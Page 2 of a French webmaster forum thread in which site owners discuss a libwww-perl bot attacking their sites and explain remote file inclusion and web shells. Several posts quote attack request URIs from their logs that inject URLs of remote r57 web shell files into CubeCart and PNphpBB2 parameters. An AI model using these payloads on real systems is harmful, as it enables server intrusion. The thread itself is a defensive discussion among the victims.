Libwww-perl 5.69 : qu'elle est ce bot de hacker ?
24 messages
• Page 2 sur 2 • 1, 2
Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
rog a écrit:path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?
==> scanner de vulnerabilité par RFI (remote file inclusion)
en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell
et le " ? " coupe la variable d'une possible concatenation dans le path
rog
Ou laj 'ai pas tous comprit
c'est censé faire quoi sur le serveur de vouloir inclure un fichier.gif (qui est en fait un script php avec extention .gif je pense ?
C'est la configuration appache et pas le script php qui est en cause si il y a uen vulnerabilité ?
Un web shell c'est quoi ?
merci
-

rog - WRInaute passionné

- Messages: 1662
- Inscription: 21 Sep 2006
un webshell est une script web (php perl python) qui donne acces à une console shell sur le server ou il est uploadé
la vulnerabilité recherchée est bien dans le script
le fichier est gif,dat,cmd,etc.. parce que si il etait en php, le server ou il est hébergé renverrait le code interprété
alors que en gif, il renvoit la source qui va etre interprétée par le server vulnerable
rog
la vulnerabilité recherchée est bien dans le script
le fichier est gif,dat,cmd,etc.. parce que si il etait en php, le server ou il est hébergé renverrait le code interprété
alors que en gif, il renvoit la source qui va etre interprétée par le server vulnerable
rog
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
et aller ça recomence, il on changés de site visiblement :
-http://ascnet.by.ru/
url qu'il tente d'injecter :
-index.php?id=http://ascnet.by.ru/cmd/list.txt?
si vous arrivez a farfouiller dans tous ces fichiers dites nous ce que vous trouvez.. moi j'ai pas le temps mais ça me soul déjà ....
ils on vraiment rien d'autre a faire ces voyous...
[Edit kazhar : Inutile de lui faire un lien]
-http://ascnet.by.ru/
url qu'il tente d'injecter :
-index.php?id=http://ascnet.by.ru/cmd/list.txt?
si vous arrivez a farfouiller dans tous ces fichiers dites nous ce que vous trouvez.. moi j'ai pas le temps mais ça me soul déjà ....
ils on vraiment rien d'autre a faire ces voyous...
[Edit kazhar : Inutile de lui faire un lien]
- marion17
- WRInaute impliqué

- Messages: 518
- Inscription: 11 Nov 2006
rog a écrit:lol
y a tous les outils pour rooter un server jusqu'au kernel 2.6.16
rog
houla...
Et pourquoi font t'il ça selon vous ?
pour "s'amuser" ou faire chanter le webmaster avec une rançon, ou autre ?
puis je comprend pas pk il affiche ça sans portection directement sur un domaine...
- iBeb
- Nouveau WRInaute

- Messages: 1
- Inscription: 29 Jan 2007
ca fait froid dans le dos...
Ce matin j'arrive (en retard comme tous les lundis matin) au bureau et regarde mes mails. Sur tous mes sites, j'ai un système d'envoi automatique de mail pour chaque erreur serveur (404, 403 et 401 principalement).
Là au lieu de la dizaine de mails que je retrouve normalement, j'en ai 450 !
et voilà la request_uri : /includes/javascript//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://alexen.ru/xpl/r57.txt??
et également :
/includes/javascript//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alexen.ru/xpl/r57.txt??
Bien sûr je sais que je n'ai ni de forum ni de caddie virtuel sur mon site, donc je suis rassuré, je sais que ça n'a pas pu aboutir...
Et heureusement, car là encore quand on va à -http://alexen.ru/xpl/r57.txt (n'y allez que si vous avez un anti virus digne de ce nom) on découvre la même chose que guicara en décembre : un sale bête...
et le *** exploite deux failles connues :
- http://www.frsirt.com/bulletins/7239 pour PNphpBB2
- http://www.frsirt.com/bulletins/3370 pour CubeCart
Mais malheureusement, je me sens impuissant ! Qui contacter pour dénoncer un site russe qui tente de pirater un site français ? Quelle action mener sachant que dans moins de 48h, l'url aura changé, et que sa cible sera un tout autre site...
[/url]
[Edit kazhar : Inutile de lui faire un lien; Maitrise tes mots]
Là au lieu de la dizaine de mails que je retrouve normalement, j'en ai 450 !
et voilà la request_uri : /includes/javascript//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://alexen.ru/xpl/r57.txt??
et également :
/includes/javascript//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alexen.ru/xpl/r57.txt??
Bien sûr je sais que je n'ai ni de forum ni de caddie virtuel sur mon site, donc je suis rassuré, je sais que ça n'a pas pu aboutir...
Et heureusement, car là encore quand on va à -http://alexen.ru/xpl/r57.txt (n'y allez que si vous avez un anti virus digne de ce nom) on découvre la même chose que guicara en décembre : un sale bête...
et le *** exploite deux failles connues :
- http://www.frsirt.com/bulletins/7239 pour PNphpBB2
- http://www.frsirt.com/bulletins/3370 pour CubeCart
Mais malheureusement, je me sens impuissant ! Qui contacter pour dénoncer un site russe qui tente de pirater un site français ? Quelle action mener sachant que dans moins de 48h, l'url aura changé, et que sa cible sera un tout autre site...
[/url]
[Edit kazhar : Inutile de lui faire un lien; Maitrise tes mots]
- Deus Ex Machina
- Nouveau WRInaute

- Messages: 11
- Inscription: 21 Nov 2009
Re: Libwww-perl 5.69 : qu'elle est ce bot de hacker ?
Bonjour, désolé du up de ce topic, mais ce bot vient de crawler mon site / forum, j'ai fais un backup de mes bases sql, puisque cela à l'air d'être un bot néfaste que sont les mesures à prendre pour l'exclure via le .htaccess ? Merci pour votre aide.
24 messages
• Page 2 sur 2 • 1, 2
Formation recommandée sur ce thème :
Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Bannir libwww-perl : quel risque en terme de référencement ?
- HELP! blocage de site Web par OVH:libwww-perl
- logs bizarre libwww-perl sur GP60OVH hier et avant-hier
- Bane IP : 72.46.130.186 - Hacker BOT
- W3C-WebCon/5.2.8 libwww/5.2.8 ?????
- W3CRobot/5.3.2 libwww/5.3.2 : Nouveau robot ???
- Google Wireless Transcoder : vieux Bot ou nouveau Bot ?
- IP google bot Vs Bot media partner ?
- Bot adSense et bot google
- RewriteMap et perl
- Etude de Googlebot, le robot crawler de Google (Fresh Bot, Deep Bot) - 05-09-2008
- Lancement de Spider Simulator - 13-06-2004
- Mise à jour de Google Images (Juillet 2006) - 10-07-2006
- Mise à jour de Google Images (16/04/2006) - 18-04-2006
- Google crawle les fichiers CSS - 25-06-2006
- Protégez-vous contre le nofollow - 21-01-2005
- Nouvelles formations Google Analytics chez Ranking Metrics - 21-12-2009
- Google Instant Preview : correction du bug Google Analytics - 01-12-2010
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

